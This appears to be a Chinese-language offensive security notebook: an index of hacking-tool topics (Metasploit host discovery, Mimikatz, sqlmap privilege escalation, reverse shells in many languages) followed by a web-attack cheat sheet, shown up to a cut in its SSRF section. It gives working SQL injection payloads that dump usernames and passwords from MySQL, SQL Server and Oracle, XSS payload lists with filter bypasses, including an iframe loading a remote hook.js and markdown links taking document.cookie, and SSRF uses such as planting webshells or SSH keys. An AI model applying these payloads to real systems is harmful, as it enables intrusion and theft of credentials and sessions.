| 1644 | 安全技术  | 安全工具                           | {'id': 6586, 'name': '基于 auxiliary/scanner/netbios/nbname 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6586, 'title': None}                                                  |
| 1645 | 安全技术  | 安全工具                           | {'id': 6587, 'name': '基于 auxiliary/scanner/http/title 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6587, 'title': None}                                                      |
| 1646 | 安全技术  | 安全工具                           | {'id': 6588, 'name': '基于 auxiliary/scanner/db2/db2\_version 发现db2服务', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6588, 'title': None}                                                 |
| 1647 | 安全技术  | 安全工具                           | {'id': 6589, 'name': '基于 auxiliary/scanner/portscan/ack 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6589, 'title': None}                                                    |
| 1648 | 安全技术  | 安全工具                           | {'id': 6590, 'name': '基于 auxiliary/scanner/portscan/tcp 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6590, 'title': None}                                                    |
| 1649 | 安全技术  | 安全工具                           | {'id': 6591, 'name': '基于 auxiliary/scanner/portscan/syn 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6591, 'title': None}                                                    |
| 1650 | 安全技术  | 安全工具                           | {'id': 6592, 'name': '基于 auxiliary/scanner/portscan/ftpbounce 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6592, 'title': None}                                              |
| 1651 | 安全技术  | 安全工具                           | {'id': 6593, 'name': '基于 auxiliary/scanner/portscan/xmas 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6593, 'title': None}                                                   |
| 1652 | 安全技术  | 安全工具                           | {'id': 6594, 'name': '基于 auxiliary/scanner/rdp/rdp\_scanner 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6594, 'title': None}                                                |
| 1653 | 安全技术  | 安全工具                           | {'id': 6595, 'name': '基于 auxiliary/scanner/smtp/smtp\_version 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6595, 'title': None}                                              |
| 1654 | 安全技术  | 安全工具                           | {'id': 6596, 'name': '基于 auxiliary/scanner/pop3/pop3\_version 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6596, 'title': None}                                              |
| 1655 | 安全技术  | 安全工具                           | {'id': 6597, 'name': '基于 auxiliary/scanner/postgres/postgres\_version 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6597, 'title': None}                                      |
| 1656 | 安全技术  | 安全工具                           | {'id': 6598, 'name': '基于 auxiliary/scanner/ftp/anonymous 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6598, 'title': None}                                                   |
| 1657 | 安全技术  | 安全工具                           | {'id': 6599, 'name': '基于 db\_nmap 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6599, 'title': None}                                                                          |
| 1658 | 安全技术  | 安全工具                           | {'id': 6600, 'name': '基于 windows/gather/arp\_scanner 发现内网存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6600, 'title': None}                                                       |
| 1659 | 安全技术  | 安全工具                           | {'id': 6601, 'name': '基于 windows/gather/enum\_ad\_computers 发现域中存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6601, 'title': None}                                                |
| 1660 | 安全技术  | 安全工具                           | {'id': 6602, 'name': '基于 windows/gather/enum\_computers 发现域中存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6602, 'title': None}                                                    |
| 1661 | 安全技术  | 安全工具                           | {'id': 6603, 'name': '基于 windows/gather/enum\_domain 发现域中存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6603, 'title': None}                                                       |
| 1662 | 安全技术  | 安全工具                           | {'id': 6604, 'name': '基于 windows/gather/enum\_domains 发现域中存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6604, 'title': None}                                                      |
| 1663 | 安全技术  | 安全工具                           | {'id': 6605, 'name': '基于 windows/gather/enum\_ad\_user\_comments 发现域中存活主机', 'pid': 275, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6605, 'title': None}                                           |
| 1664 | 安全技术  | 安全工具                           | {'id': 6408, 'name': ' Debian9 安装 Metasploit', 'pid': 242, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6408, 'title': None}                                                                        |
| 1665 | 安全技术  | 安全工具                           | {'id': 6409, 'name': ' Impersonation token', 'pid': 242, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6409, 'title': None}                                                                          |
| 1666 | 安全技术  | 安全工具                           | {'id': 7171, 'name': 'Mimikatz 免参数直接输出魔改版', 'pid': 427, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7171, 'title': None}                                                                           |
| 1667 | 安全技术  | 安全工具                           | {'id': 7173, 'name': 'Mimikatz 常规使用方法介绍', 'pid': 427, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7173, 'title': None}                                                                             |
| 1668 | 安全技术  | 安全工具                           | {'id': 7181, 'name': 'Mimikatz 官方参数', 'pid': 427, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7181, 'title': None}                                                                                 |
| 1669 | 安全技术  | 安全工具                           | {'id': 6410, 'name': 'Sqlmap参数说明', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6410, 'title': None}                                                                                    |
| 1670 | 安全技术  | 安全工具                           | {'id': 6411, 'name': 'Sqlmap udf提权过程', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6411, 'title': None}                                                                                |
| 1671 | 安全技术  | 安全工具                           | {'id': 6412, 'name': 'Sqlmap udf提权原理', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6412, 'title': None}                                                                                |
| 1672 | 安全技术  | 安全工具                           | {'id': 6413, 'name': 'Sqlmap os-shell原理', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6413, 'title': None}                                                                             |
| 1673 | 安全技术  | 安全工具                           | {'id': 6414, 'name': 'sqlmap os-shell certutil提权', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6414, 'title': None}                                                                    |
| 1674 | 安全技术  | 安全工具                           | {'id': 6415, 'name': 'sqlmap+burp辅助批量注入验证', 'pid': 244, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6415, 'title': None}                                                                           |
| 1675 | 安全技术  | 安全工具                           | {'id': 6416, 'name': 'sqlmap tamper速查梳理', 'pid': 245, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6416, 'title': None}                                                                             |
| 1676 | 安全技术  | 安全工具                           | {'id': 6419, 'name': 'Tor-IP-Changer实现Sqlmap自动切换代理IP', 'pid': 246, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6419, 'title': None}                                                                |
| 1677 | 安全技术  | 安全工具                           | {'id': 6420, 'name': 'Sqlmap rps脚本', 'pid': 246, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6420, 'title': None}                                                                                  |
| 1678 | 安全技术  | 安全工具                           | {'id': 6421, 'name': 'ProxySqlMap version 0.2', 'pid': 246, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6421, 'title': None}                                                                       |
| 1679 | 安全技术  | 安全工具                           | {'id': 7060, 'name': 'CommonsCollections1', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7060, 'title': None}                                                                           |
| 1680 | 安全技术  | 安全工具                           | {'id': 7061, 'name': 'CommonsCollections2', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7061, 'title': None}                                                                           |
| 1681 | 安全技术  | 安全工具                           | {'id': 7062, 'name': 'CommonsCollections3', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7062, 'title': None}                                                                           |
| 1682 | 安全技术  | 安全工具                           | {'id': 7063, 'name': 'CommonsCollections4', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7063, 'title': None}                                                                           |
| 1683 | 安全技术  | 安全工具                           | {'id': 7064, 'name': 'CommonsCollections5', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7064, 'title': None}                                                                           |
| 1684 | 安全技术  | 安全工具                           | {'id': 7065, 'name': 'CommonsCollections6', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7065, 'title': None}                                                                           |
| 1685 | 安全技术  | 安全工具                           | {'id': 7066, 'name': 'CommonsCollections7', 'pid': 385, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7066, 'title': None}                                                                           |
| 1686 | 安全技术  | 安全工具                           | {'id': 6423, 'name': '2004', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6423, 'title': None}                                                                                          |
| 1687 | 安全技术  | 安全工具                           | {'id': 6424, 'name': '2005', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6424, 'title': None}                                                                                          |
| 1688 | 安全技术  | 安全工具                           | {'id': 6425, 'name': '2006', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6425, 'title': None}                                                                                          |
| 1689 | 安全技术  | 安全工具                           | {'id': 6426, 'name': '2008', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6426, 'title': None}                                                                                          |
| 1690 | 安全技术  | 安全工具                           | {'id': 6427, 'name': '2009', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6427, 'title': None}                                                                                          |
| 1691 | 安全技术  | 安全工具                           | {'id': 6428, 'name': '2010', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6428, 'title': None}                                                                                          |
| 1692 | 安全技术  | 安全工具                           | {'id': 6429, 'name': '2012', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6429, 'title': None}                                                                                          |
| 1693 | 安全技术  | 安全工具                           | {'id': 6430, 'name': '2013', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6430, 'title': None}                                                                                          |
| 1694 | 安全技术  | 安全工具                           | {'id': 6431, 'name': '2014', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6431, 'title': None}                                                                                          |
| 1695 | 安全技术  | 安全工具                           | {'id': 6432, 'name': '2015', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6432, 'title': None}                                                                                          |
| 1696 | 安全技术  | 安全工具                           | {'id': 6433, 'name': '2016', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6433, 'title': None}                                                                                          |
| 1697 | 安全技术  | 安全工具                           | {'id': 6434, 'name': '2017', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6434, 'title': None}                                                                                          |
| 1698 | 安全技术  | 安全工具                           | {'id': 6435, 'name': '2018', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6435, 'title': None}                                                                                          |
| 1699 | 安全技术  | 安全工具                           | {'id': 6436, 'name': '2019', 'pid': 248, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6436, 'title': None}                                                                                          |
| 1700 | 安全技术  | 安全工具                           | {'id': 6437, 'name': 'Windows提权总结', 'pid': 249, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6437, 'title': None}                                                                                   |
| 1701 | 安全技术  | 安全工具                           | {'id': 6438, 'name': 'Win辅助提权脚本', 'pid': 249, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6438, 'title': None}                                                                                     |
| 1702 | 安全技术  | 安全工具                           | {'id': 6439, 'name': 'FuzzScan', 'pid': 250, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6439, 'title': None}                                                                                      |
| 1703 | 安全技术  | 安全工具                           | {'id': 6440, 'name': 'OneForAll', 'pid': 250, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6440, 'title': None}                                                                                     |
| 1704 | 安全技术  | 安全工具                           | {'id': 6441, 'name': 'Cookie-Editor', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6441, 'title': None}                                                                                 |
| 1705 | 安全技术  | 安全工具                           | {'id': 6442, 'name': 'FOFA Pro', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6442, 'title': None}                                                                                      |
| 1706 | 安全技术  | 安全工具                           | {'id': 6443, 'name': 'Hackbar', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6443, 'title': None}                                                                                       |
| 1707 | 安全技术  | 安全工具                           | {'id': 6444, 'name': 'Set Character Encoding', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6444, 'title': None}                                                                        |
| 1708 | 安全技术  | 安全工具                           | {'id': 6445, 'name': 'Swichsharp', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6445, 'title': None}                                                                                    |
| 1709 | 安全技术  | 安全工具                           | {'id': 6446, 'name': 'User-Agent Switcher', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6446, 'title': None}                                                                           |
| 1710 | 安全技术  | 安全工具                           | {'id': 6447, 'name': 'XssSniper', 'pid': 251, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6447, 'title': None}                                                                                     |
| 1711 | 安全技术  | 安全工具                           | {'id': 6448, 'name': 'cms 指纹识别', 'pid': 252, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6448, 'title': None}                                                                                      |
| 1712 | 安全技术  | 安全工具                           | {'id': 6449, 'name': 'waf 指纹识别', 'pid': 252, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6449, 'title': None}                                                                                      |
| 1713 | 安全技术  | 反弹shell                        | {'id': 6462, 'name': 'Awk反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6462, 'title': None}                                                                                    |
| 1714 | 安全技术  | 反弹shell                        | {'id': 6451, 'name': 'Bash环境下反弹TCP协议shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6451, 'title': None}                                                                           |
| 1715 | 安全技术  | 反弹shell                        | {'id': 6452, 'name': 'Bash环境下反弹UDP协议shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6452, 'title': None}                                                                           |
| 1716 | 安全技术  | 反弹shell                        | {'id': 6471, 'name': 'Lua脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6471, 'title': None}                                                                                  |
| 1717 | 安全技术  | 反弹shell                        | {'id': 6475, 'name': 'Meterpreter反弹Shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6475, 'title': None}                                                                            |
| 1718 | 安全技术  | 反弹shell                        | {'id': 6469, 'name': 'Java版本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6469, 'title': None}                                                                                 |
| 1719 | 安全技术  | 反弹shell                        | {'id': 6473, 'name': 'Groovy版本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6473, 'title': None}                                                                               |
| 1720 | 安全技术  | 反弹shell                        | {'id': 6454, 'name': 'Ncat反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6454, 'title': None}                                                                                   |
| 1721 | 安全技术  | 反弹shell                        | {'id': 6453, 'name': 'Netcat反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6453, 'title': None}                                                                                 |
| 1722 | 安全技术  | 反弹shell                        | {'id': 6472, 'name': 'NodeJS版本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6472, 'title': None}                                                                               |
| 1723 | 安全技术  | 反弹shell                        | {'id': 6457, 'name': 'Perl脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6457, 'title': None}                                                                                 |
| 1724 | 安全技术  | 反弹shell                        | {'id': 6459, 'name': 'PHP脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6459, 'title': None}                                                                                  |
| 1725 | 安全技术  | 反弹shell                        | {'id': 6460, 'name': 'Ruby脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6460, 'title': None}                                                                                 |
| 1726 | 安全技术  | 反弹shell                        | {'id': 6456, 'name': 'Socat反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6456, 'title': None}                                                                                  |
| 1727 | 安全技术  | 反弹shell                        | {'id': 6468, 'name': 'TCL脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6468, 'title': None}                                                                                  |
| 1728 | 安全技术  | 反弹shell                        | {'id': 6470, 'name': 'War文件反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6470, 'title': None}                                                                                  |
| 1729 | 安全技术  | 反弹shell                        | {'id': 6458, 'name': 'Python脚本反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6458, 'title': None}                                                                               |
| 1730 | 安全技术  | 反弹shell                        | {'id': 6474, 'name': 'Xterm反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6474, 'title': None}                                                                                  |
| 1731 | 安全技术  | 反弹shell                        | {'id': 6461, 'name': 'Powershell反弹shell', 'pid': 253, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6461, 'title': None}                                                                             |
| 1732 | 友情链接  | 友情链接                           | {'id': 6465, 'name': '友情链接', 'pid': 254, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6465, 'title': None}                                                                                          |


# 代码审计

古风正抓紧开发中


# WEB安全拓展

![WEB安全拓展](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUcRcD_wAYkgiUYwxoz%2F-MUcUE9W8iKUmI5f9ikW%2FWEB%E5%AE%89%E5%85%A8%E6%8B%93%E5%B1%95.png?alt=media\&token=bdab11be-e6bd-47a9-85e8-daa7b14d50ad)


# PHP代码审计笔记

留在这先不更


# JAVA代码审计笔记

留在这先不更


# 加密解密

RSA

DES

3DES

AES

MD5

SHA-1

SHA-256

SM3


# Scan Script

{% embed url="<https://github.com/fnmsd/awvs_script_decode>" %}


# awvs\_script\_decode


# Web安全


# Web安全

## 0x01SQL注入

### 判断

* `'` / `"`
* `1/1`
* `1/0`
* `and 1=1`
* `" and "1"="1`
* `and 1=2`
* `or 1=1`
* `or 1=`
* `' and '1'='1`
* `+` `-` `^` `*` `%` `/`
* `<<` `>>` `||` `|` `&` `&&`
* `~`
* `!`
* `@`
* 反引号执行

### MYSQL

#### **显注**

```
判断站点表中有多少字段
order by 1#1可以变1-无穷
进行联合查询，来暴露可查询的字段编号
union select 1,2,3
查询当前数据库名
union select 1,database(),3
查询所有数据库名
union select 1,(select group_concat(schema_name) from information_schema.schemata),3
查询当前数据库所有表
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='DBname'),3
查询当前表所有字段名
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='DBname' and table_name=TABLEname),3
查询数据
union select 1,(select group_concat(username,0x7e,password,0x7e) from TABLEname),3
拓展
length()函数可返回字符串的长度
select length(database());
substring()函数可以截取字符串，可指定开始的位置和截取的长度
select substring('test',1,3);
ord()函数可以返回单个字符的ASCII码
select substring(database(),1,1);
char()函数可将ASCII码转换为对应的字符
select char(116);
```

#### **盲注**

```
判断数据库中表的数量
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#
判断数据库名
1' and (ascii(substr((/*!database*/()),1,1))>64)#
1' and (ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1)))=1#
判断表名长度
1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=1#
判断表名
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97#
判断表中的字段数
1' and (select count(column_name) from information_schema.columns where table_name='TABLEname')=1#
判断每个字段的长度
1' and length(substr((select column_name from information_schema.columns where table_name='TABLEname' limit 0,1),1))=1#
判断字段名
1' and ascii(substr((select column_name from information_schema.columns where table_name='TABLEname' limit 3,1),1,1))>97#
爆出数据
判断表中段的长度
1' and (select length(TABLEname) from users where COLUMNname=1)=5#
判断出段中数据名
1' and ascii(substr((select COLUMNSname from TABLEname limit 0,1),1,1))=97#
```

### SQL SERVER

#### **显注**

```
sysdatabases,sysobjects,syscolumns
查询所有的数据库名
select *from master..sysyatabases
查询数据库中所有的表名
select name from master..sysobjects where Xtypee = 'x' 
查询表中所有的列名
select * from databases..table
top和dbid可以一起用也可以只用一个排除默认表
查找回显点
union all select null,null,null;
查找数据库表名称
union select 1,‘2’,db_name()
select top 1 name from master..sysdatabases where dbid>4
获得表名
union select null,name,null from test.sys.sysobjects where xtype = ‘U’
union select top 1 null,name,null from test.sys.sysobjects where xtype = ‘U’ and name !=‘users’ and name !=’…’
select top 1 name from master..sysdatabases where dbid>4 and name<> 'DBname'
查看对应表有哪些列
union select top 1 null,name,null from test.sys.syscolumns where id = object_id(‘users’);
union select top 1 null,name,null from test.sys.syscolumns where id = object_id(‘users’) and name !=‘id’ and name !=’…’;
查看列信息
union select top 1 null,username,password from users
union select top 1 null,username,password from users where username !=‘zs’ and username !=’…’
```

#### **盲注**

```
判断是否是mssql
and user>0
and (select count(*) from sysobjects)>0     mssql
and (select count(*) from msysobjects)>0    access
查询当前用户数据信息
having 1=1–
猜表名
and exists(select * from tablename)
and (Select Count(*) from [表名])>0
猜字段
and (Select Count(字段名) from 表名)>0
暴当前表中的列
group by admin.username having 1=1–
猜字段中记录长度
and (select top 1 len(字段名) from 表名)>0
猜字段中的ascii值
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 access
and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 mssql
测试权限结构（mssql）
and 1=(SELECT IS_SRVROLEMEMBER(‘sysadmin’));–
and 1=(SELECT IS_SRVROLEMEMBER(‘serveradmin’));–
and 1=(SELECT IS_SRVROLEMEMBER(‘setupadmin’));–
and 1=(SELECT IS_SRVROLEMEMBER(‘securityadmin’));–
and 1=(SELECT IS_SRVROLEMEMBER(‘diskadmin’));–
and 1=(SELECT IS_SRVROLEMEMBER(‘bulkadmin’));–
and 1=(SELECT IS_MEMBER(‘db_owner’));–
mssql内置函数
and (select @@version)>0　　　获得Windows的版本号
and user_name()=’dbo’　　　　 判断当前系统的连接用户是不是sa
and (select user_name())>0　　爆当前系统的连接用户
and (select db_name())>0　　　得到当前连接的数据库
```

报错注入[MSSQL数据库注入](http://zone.secevery.com/article/1055)

### ORACLE

#### **显注**

```
order by
union select null,null,null from dual
union select null,null,(select banner from sys.v_$version where rownum=1) from dual
union select null,null,(select owner from all_tables where rownum=1) from dual
union select null,null,(select owner from all_tables where rownum=1 and owner <>'SYS' ) from dual
union select null,null,(select table_name from user_tables where rownum=1) from dual
union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1) from dual
union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1)  from dual
union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1) from dual
union select null,(SELECT CONCAT(USERNAME,PASSWORD) FROM ADMIN) from dual
union select null,(SELECT USERNAME FROM ADMIN),(SELECT PASSWORD FROM ADMIN) from dual
一些常用的查询语句：
当前用户：
SELECT user FROM dual;
列出所有用户：
SELECT username FROM all_users ORDER BY username;
列出数据库
SELECT DISTINCT owner FROM all_tables;
列出表名：
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
查询表所有列
SELECT column_name FROM all_tab_columns WHERE TABLE_NAME='ADMIN';
定位文件
SELECT name FROM V$DATAFILE;
```

暂时略，都会更新下来

## 0x02XSS

感谢原作创作不易

### 常用

```
<script>alert(/xss/)</script>
<svg onload=alert(document.domain)>
<img src=document.domain onerror=alert(document.domain)>
<M onmouseover=alert(document.domain)>M
<marquee onscroll=alert(document.domain)>
<a href=javascript:alert(document.domain)>M</a>
<body onload=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
<embed src=javascript:alert(document.domain)>
```

### 大小写绕过

```
<script>alert(1)</script>
<sCrIpT>alert(1)</sCrIpT>
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</ScRiPt>
<ScRiPt>alert(1)</sCrIpT>
<img src=1 onerror=alert(1)>
<iMg src=1 oNeRrOr=alert(1)>
<ImG src=1 OnErRoR=alert(1)>
<img src=1 onerror="alert(&quot;M&quot;)">
<marquee onscroll=alert(1)>
<mArQuEe OnScRoLl=alert(1)>
<MaRqUeE oNsCrOlL=alert(1)>
```

### 各种alert

```
<script>alert(1)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<script>alert('1')</script>
<script>alert("1")</script>
<script>alert`1`</script>
<script>(alert)(1)</script>
<script>a=alert,a(1)</script>
<script>[1].find(alert)</script>
<script>top["al"+"ert"](1)</script>
<script>top["a"+"l"+"e"+"r"+"t"](1)</script>
<script>top[/al/.source+/ert/.source](1)</script>
<script>top[/a/.source+/l/.source+/e/.source+/r/.source+/t/.source](1)</script>
```

### 伪协议

```
<a href=javascript:/0/,alert(%22M%22)>M</a>
<a href=javascript:/00/,alert(%22M%22)>M</a>
<a href=javascript:/000/,alert(%22M%22)>M</a>
<a href=javascript:/M/,alert(%22M%22)>M</a>
```

### Chrome XSS auditor bypass

```
?param=https://&param=@z.exeye.io/import%20rel=import%3E
<base href=javascript:/M/><a href=,alert(1)>M</a>
<base href=javascript:/M/><iframe src=,alert(1)></iframe>
```

### 长度限制

```
<script>s+="l"</script>
\...
<script>eval(s)</script>
```

### jquery sourceMappingURL

```
</textarea><script>var a=1//@ sourceMappingURL=//xss.site</script>
```

### 图片名

```
"><img src=x onerror=alert(document.cookie)>.gif
```

### 过期的payload

```
src=javascript:alert基本不可以用
css expression特性只在旧版本ie可用
```

### css

```
<div style="background-image:url(javascript:alert(/xss/))">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
```

### markdown

```
[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
```

### iframe

```
<iframe onload='
    var sc   = document.createElement("scr" + "ipt");
    sc.type  = "text/javascr" + "ipt";
    sc.src   = "http://1.2.3.4/js/hook.js";
    document.body.appendChild(sc);
    '
/>
<iframe src=javascript:alert(1)></iframe>
<iframe src="data:text/html,<iframe src=javascript:alert('M')></iframe>"></iframe>
<iframe src=data:text/html;base64,PGlmcmFtZSBzcmM9amF2YXNjcmlwdDphbGVydCgiTWFubml4Iik+PC9pZnJhbWU+></iframe>
<iframe srcdoc=<svg/o&#x6E;load&equals;alert&lpar;1)&gt;></iframe>
<iframe src=https://baidu.com width=1366 height=768></iframe>
<iframe src=javascript:alert(1) width=1366 height=768></iframe
```

### form

```
<form action=javascript:alert(1)><input type=submit>
<form><button formaction=javascript:alert(1)>M
<form><input formaction=javascript:alert(1) type=submit value=M>
<form><input formaction=javascript:alert(1) type=image value=M>
<form><input formaction=javascript:alert(1) type=image src=1>
```

### meta

```
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
```

## 0x03CSRF

这里只推荐工具吧

### 工具

{% embed url="<https://github.com/tgianko/deemon/>" %}

CSRFTester #需要抓包

burpsuite #需要抓包

## 0x04SSRF

### 可利用的点

```
Apache Hadoop远程命令执行
axis2-admin部署Server命令执行
Confluence SSRF
counchdb WEB API远程命令执行
dict
docker API远程命令执行
Elasticsearch引擎Groovy脚本命令执行
ftp / ftps（FTP爆破）
glassfish任意文件读取和war文件部署间接命令执行
gopher
HFS远程命令执行
http、https
imap/imaps/pop3/pop3s/smtp/smtps（爆破邮件用户名密码）
Java调试接口命令执行
JBOSS远程Invoker war命令执行
Jenkins Scripts接口命令执行
ldap
mongodb
php_fpm/fastcgi 命令执行
rtsp - smb/smbs（连接SMB）
sftp
ShellShock 命令执行
Struts2 命令执行
telnet
tftp（UDP协议扩展）
tomcat命令执行
WebDav PUT上传任意文件
WebSphere Admin可部署war间接命令执行
zentoPMS远程命令执行
写ssh公钥
写crontab
写WebShell
Windows写启动项
主从复制加载 .so 文件
主从复制写无损文件
```

### 其他利用协议

```
gopher
dict
dict
file
ftp
ftps
gopher
http
https
imap
imaps
ldap
pop3
pop3s
rtsp
scp
sftp
smtp
smtps
telnet
tftp
```

### 可能触发的点，也就是可能存在ssrf的参数位置

```
